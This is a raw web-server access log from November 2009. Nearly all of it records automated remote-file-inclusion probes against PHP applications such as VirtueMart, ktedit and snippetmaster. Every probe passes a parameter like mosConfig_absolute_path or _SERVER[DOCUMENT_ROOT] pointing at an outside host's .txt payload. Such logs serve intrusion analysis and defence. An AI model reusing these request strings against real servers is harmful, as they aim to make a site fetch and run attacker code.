78.110.54.243 - - [13/Nov/2009:01:45:18 -0500] "GET /logs/access_log.Q109072400%20%20//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:45:36 -0500] "GET /logs/access_log.Q109081900%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
69.36.4.40 - - [13/Nov/2009:01:47:59 -0500] "GET //appserv/main.php?appserv_root=http://ucing90.fileave.com/test.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
69.36.4.40 - - [13/Nov/2009:01:47:59 -0500] "GET /logs//appserv/main.php?appserv_root=http://ucing90.fileave.com/test.txt? HTTP/1.1" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:19 -0500] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:23 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:23 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:23 -0500] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:23 -0500] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:34 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:34 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:34 -0500] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:48:34 -0500] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:49:36 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:49:39 -0500] "GET /logs/access_log.Q109082800%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:49:39 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:49:55 -0500] "GET /logs/access_log.Q109081900%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:50:13 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:50:19 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:50:19 -0500] "GET /logs/access_log.Q109082800%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:50:28 -0500] "GET /logs/access_log.Q109081900%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.29.159.130 - - [13/Nov/2009:01:51:18 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://mickeysmoments.com/wp-content/uploads/tes.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
217.29.159.130 - - [13/Nov/2009:01:51:18 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://mickeysmoments.com/wp-content/uploads/tes.txt?? HTTP/1.1" 200 25812 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
216.199.232.112 - - [13/Nov/2009:01:51:22 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:51:22 -0500] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:51:22 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:52:30 -0500] "GET //////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:52:30 -0500] "GET /logs/access_log.Q109091400//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:52:30 -0500] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 25815 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:52:45 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:52:45 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:52:45 -0500] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
140.113.223.66 - - [13/Nov/2009:01:52:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
140.113.223.66 - - [13/Nov/2009:01:52:55 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
140.113.223.66 - - [13/Nov/2009:01:52:55 -0500] "GET /logs/access_log.Q109082800%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
140.113.223.66 - - [13/Nov/2009:01:53:13 -0500] "GET /logs/access_log.Q109081900%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:21 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:21 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:21 -0500] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:21 -0500] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:21 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:21 -0500] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:21 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:01:53:22 -0500] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:53:39 -0500] "GET /logs/access_log.Q109091400%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:53:39 -0500] "GET /logs/access_log.Q109072200%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:53:39 -0500] "GET //ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:53:39 -0500] "GET /logs/access_log.Q109081600//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:53:39 -0500] "GET /logs/access_log.Q109072400//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:53:39 -0500] "GET /logs//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:01:54:40 -0500] "GET /?sourcedir=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:01:54:40 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:01:54:40 -0500] "GET /logs/?sourcedir=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:54:46 -0500] "GET /logs/access_log.Q109081600%20%20//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:54:46 -0500] "GET /logs/access_log.Q109072400%20%20//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.29.159.130 - - [13/Nov/2009:01:55:13 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://mickeysmoments.com/wp-content/uploads/tes.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
116.68.248.199 - - [13/Nov/2009:01:55:18 -0500] "GET /logs/access_log.Q109062500//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.webster.net.pl///modules/id?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
116.68.248.199 - - [13/Nov/2009:01:55:19 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.webster.net.pl///modules/id?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
116.68.248.199 - - [13/Nov/2009:01:55:20 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.webster.net.pl///modules/id?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
216.199.232.112 - - [13/Nov/2009:01:55:24 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:55:24 -0500] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:55:24 -0500] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:55:24 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 200 25813 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:55:42 -0500] "GET /logs/access_log.Q109072200//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
116.68.248.199 - - [13/Nov/2009:01:55:45 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.webster.net.pl///modules/id?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.79.101.98 - - [13/Nov/2009:01:56:08 -0500] "GET /logs/access_log.Q109072200//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:56:11 -0500] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:56:11 -0500] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:56:11 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:56:11 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 200 25813 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:01:56:12 -0500] "GET /logs/?sourcedir=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:01:56:12 -0500] "GET /?sourcedir=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:01:56:26 -0500] "GET /logs/access_log.Q109052300/?sourcedir=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:56:42 -0500] "GET /logs/access_log.Q109090400////?_SERVER[DOCUMENT_ROOT]=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:56:42 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:56:42 -0500] "GET /logs/error_log.Q109090400////?_SERVER[DOCUMENT_ROOT]=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:56:42 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 200 25813 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:01:56:53 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.68.248.199 - - [13/Nov/2009:01:57:03 -0500] "GET /logs/access_log.Q109062400//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.webster.net.pl///modules/id?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
216.199.232.112 - - [13/Nov/2009:01:57:42 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:57:42 -0500] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:57:53 -0500] "GET /logs/access_log.Q109090400%20%20////?_SERVER[DOCUMENT_ROOT]=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:57:53 -0500] "GET /logs/error_log.Q109090400%20%20////?_SERVER[DOCUMENT_ROOT]=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:58:10 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:01:58:10 -0500] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:01:59:27 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.50.85.59 - - [13/Nov/2009:02:00:55 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:00:55 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:00:55 -0500] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:00:55 -0500] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:00:57 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:00:57 -0500] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:00:57 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:00:57 -0500] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:01:08 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:01:08 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:02:01:17 -0500] "GET /logs/access_log.Q109101000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:01:40 -0500] "GET /?DOCUMENT_ROOT=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:01:40 -0500] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:01:40 -0500] "GET /logs/?DOCUMENT_ROOT=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:02:02:32 -0500] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:03:11 -0500] "GET /?DOCUMENT_ROOT=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:03:11 -0500] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:03:11 -0500] "GET /logs/?DOCUMENT_ROOT=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:02:03:23 -0500] "GET //include/write.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:02:03:23 -0500] "GET /logs//include/write.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:02:03:23 -0500] "GET /logs/access_log.Q109102400%20%20//include/write.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:02:03:39 -0500] "GET /logs/access_log.Q109091200%20%20//include/write.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:04:12 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:04:12 -0500] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:04:12 -0500] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:04:12 -0500] "GET /e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:04 -0500] "GET /e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:04 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:04 -0500] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:25 -0500] "GET /e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:25 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:36 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:36 -0500] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:36 -0500] "GET /e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:05:36 -0500] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
